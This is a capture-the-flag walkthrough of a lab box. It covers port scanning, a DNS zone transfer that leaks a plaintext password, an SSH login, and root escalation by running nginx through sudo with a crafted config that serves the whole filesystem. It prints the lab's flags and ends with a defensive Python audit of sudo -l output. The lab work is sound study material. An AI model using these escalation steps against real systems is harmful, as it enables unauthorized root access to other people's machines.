Nmap
┌──(kali㉿kali)-[~]
└─$ nmap -p0-65535 --min-rate 5000 192.168.205.240
Starting Nmap 7.99 ( https://nmap.org ) at 2026-06-19 21:00 -0400
Nmap scan report for 192.168.205.240
Host is up (0.00031s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
80/tcp open http
MAC Address: 08:00:27:14:EF:25 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 2.22 seconds
Ports 22, 53 and 80 are open; focus on DNS and the web service.
Web
┌──(kali㉿kali)-[~]
└─$ curl -v http://192.168.205.240/
< HTTP/1.1 200 OK
< Server: nginx/1.14.2
<img src="comic.png" alt="comic">
<!--webmaster.hmv-->
The HTML comment leaks the domain name webmaster.hmv.
DNS Zone Transfer
Use the leaked domain to attempt a zone transfer:
┌──(kali㉿kali)-[~]
└─$ dig axfr @192.168.205.240 webmaster.hmv
webmaster.hmv. 604800 IN SOA ns1.webmaster.hmv. root.webmaster.hmv. 2 604800 86400 2419200 604800
webmaster.hmv. 604800 IN NS ns1.webmaster.hmv.
ftp.webmaster.hmv. 604800 IN CNAME www.webmaster.hmv.
john.webmaster.hmv. 604800 IN TXT "Myhiddenpazzword"
mail.webmaster.hmv. 604800 IN A 192.168.0.12
ns1.webmaster.hmv. 604800 IN A 127.0.0.1
www.webmaster.hmv. 604800 IN A 192.168.0.11
The TXT record for john.webmaster.hmv contains a password in plain text: Myhiddenpazzword
SSH
Log in with john / Myhiddenpazzword:
┌──(kali㉿kali)-[~]
└─$ sshpass -p 'Myhiddenpazzword' ssh -o StrictHostKeyChecking=no john@192.168.205.240
john@webmaster:~$ id
uid=1000(john) gid=1000(john) groups=1000(john),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
Read the user flag:
john@webmaster:~$ cat user.txt
HMVdnsyo
Privilege Escalation
sudo -l
john@webmaster:~$ sudo -l
Matching Defaults entries for john on webmaster:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User john may run the following commands on webmaster:
(ALL : ALL) NOPASSWD: /usr/sbin/nginx
john can run nginx as root without a password.
nginx Privilege Escalation
Following GTFOBins, write a config containing user root; so that the nginx worker runs as root, and root /; autoindex on; so that the whole filesystem is browsable:
john@webmaster:~$ cat > /tmp/nginx.conf << 'EOF'
user root;
events {}
http {
server {
listen 8080;
root /;
autoindex on;
}
}
EOF
john@webmaster:~$ sudo nginx -c /tmp/nginx.conf -p /tmp
Key point: -p /tmp must be passed to set the prefix path; otherwise nginx cannot load the .so files from its module directory and the worker process never starts.
Read the root directory through the newly started nginx:
john@webmaster:~$ wget http://127.0.0.1:8080/root/ -O -
<html>
<head><title>Index of /root/</title></head>
<body bgcolor="white">
<h1>Index of /root/</h1><hr><pre><a href="../">../</a>
<a href="flag.sh">flag.sh</a> 05-Dec-2020 09:49 1920
<a href="root.txt">root.txt</a> 05-Dec-2020 09:50 13
</pre><hr></body>
</html>
john@webmaster:~$ wget http://127.0.0.1:8080/root/root.txt -O -
HMVnginxpwnd
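An added defensive check, not part of the original writeup: a small Python audit that parses sudo -l output and flags the pattern abused in the sudo -l and nginx sections above, a sudoers entry that runs a config-loading daemon as root with no argument restriction. The sample output and the CONFIG_LOADING_DAEMONS list are constructed for this example.

```python
import os
import re

# Constructed sample of `sudo -l` output, modelled on the entry shown on this
# page plus one argument-restricted entry for contrast (not from the box).
SAMPLE_SUDO_L = """\
Matching Defaults entries for john on webmaster:
User john may run the following commands on webmaster:
    (ALL : ALL) NOPASSWD: /usr/sbin/nginx
    (root) /usr/bin/systemctl restart nginx
"""

# Daemons that accept a caller-supplied config file (-c) and honour a "user"
# directive in it. Assumption: short illustrative list; nginx is this box's case.
CONFIG_LOADING_DAEMONS = {"nginx", "apache2", "httpd"}

# Matches "(runas) [TAG: ...] command [args]" lines and nothing else.
ENTRY_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*?)\s*$")

def parse_sudo_l(text):
    """Return one record per command line; Defaults and heading lines are skipped."""
    entries = []
    for line in text.splitlines():
        m = ENTRY_RE.match(line)
        if not m:
            continue
        binary, _, args = m.group("cmd").partition(" ")
        entries.append({
            "runas_user": m.group("runas").split(":")[0].strip(),
            "nopasswd": "NOPASSWD:" in m.group("tags"),
            "binary": binary,
            "name": os.path.basename(binary),
            "args": args.strip(),
        })
    return entries

def audit(entries):
    """Attach a list of risk strings to each entry; an empty list means no finding."""
    for e in entries:
        risks = []
        as_root = e["runas_user"] in ("ALL", "root")
        if as_root and e["args"] == "":
            # sudoers semantics: a command listed without arguments permits ANY arguments.
            risks.append("unrestricted arguments: any -c/-p/-g accepted")
        if as_root and e["name"] in CONFIG_LOADING_DAEMONS:
            risks.append("daemon loads caller-supplied config as root")
        if risks and e["nopasswd"]:
            risks.append("NOPASSWD: no credential prompt to deter or log")
        e["risks"] = risks
    return entries
```

The fix for a flagged entry is to pin the exact arguments in sudoers (for example an nginx reload or config test) rather than granting the bare binary.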